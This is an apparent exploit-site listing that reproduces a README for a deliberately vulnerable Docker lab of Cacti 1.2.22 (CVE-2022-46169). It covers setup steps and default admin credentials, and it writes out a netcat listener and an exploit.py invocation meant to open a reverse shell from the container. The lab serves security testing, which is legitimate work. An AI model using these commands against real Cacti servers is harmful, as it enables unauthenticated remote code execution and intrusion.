Exploit for OS Command Injection in Cacti CVE-2022-46169

Name: Exploit for OS Command Injection in Cacti CVE-2022-46169
Rating: 5 (100 reviews)
2023-04-01 | CVSS 7.5
## https://sploitus.com/exploit?id=03CA9591-67BF-5B9A-A0B3-247EAFACE864
# Cacti v1.2.22 command injection (CVE-2022-46169) vulnerable application

This is a vulnerable application to test the exploit for the **Cacti** vulnerability (**CVE-2022-46169**).

## WARNING!

**This application contains serious security vulnerabilities. Run it at your own risk! It is recommended using a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet facing servers, as they will be compromised.**

***DISCLAIMER*: I do not take responsibility for the way in which any one uses this application. The only purpose of this application is to be a test scenario for the CVE-2022-46169 exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.**

## Vulnerability info

* **CVE-ID**: CVE-2022-46169
* **Link**: [https://vulners.com/cve/CVE-2022-46169](https://vulners.com/cve/CVE-2022-46169)
* **Description**: In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

## Usage

Here the steps to **setup** the environment:
1. Launch `docker compose up -d` to start composition.
2. You can finalize the steps by browsing to [http://127.0.0.1/cacti](http://127.0.0.1/cacti) to start the Cacti initialization wizard. If you get an error referring to the database, just wait a little bit and refresh the page.
3. Default credentials are `admin`/`admin`.
4. Press "*Next*" to all the buttons during the wizard, choosing options accordingly. All the defaults should be fine and all the mandatory prerequisites should be satisfied.
5. After the installation, you have to setup a new graph:
    1. Click on "[*Create graphs*](http://127.0.0.1/cacti/graphs_new.php)".
    2. Under "*Graph Templates*" section, in the dropdown menù near "*Create*", select: "*Device - Uptime*".
    3. Press "*Create*" button.

The container will be called `vuln-cacti`.

To **teardown** the environment use `docker compose down` command.

The official installation guide of Cacti can be found [here](https://docs.cacti.net/README.md#cacti-installation).

## Root cause

A detailed root cause of the vulnerability is available [here](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf).

## Exploit

A public exploit is available on [Exploit-DB](https://www.exploit-db.com/exploits/51166). It has been copied under the `exploit/` folder for simplicity.

To run it:
1. Use netcat on the host machine to listen for incoming connections.
    ```
    nc -lvp 6669
    ```
2. Launch the exploit.
    ```
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    ```
    Tip: `host.docker.internal` is used to reach the host machine from the container ([reference](https://stackoverflow.com/questions/31324981/how-to-access-host-port-from-docker-container)).

There is also an entry in [*vulhub* repository](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169).

## Authors

* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)

## License

This project is licensed under the Unlicense - see the **LICENSE** file for details.

## Acknowledgments

* [Stefan Schiller](https://github.com/stefan-schiller-sonarsource), the security researcher who discovered the vulnerability.
* [Riadh Bouchahoua](https://www.exploit-db.com/exploits/51166), the exploit developer.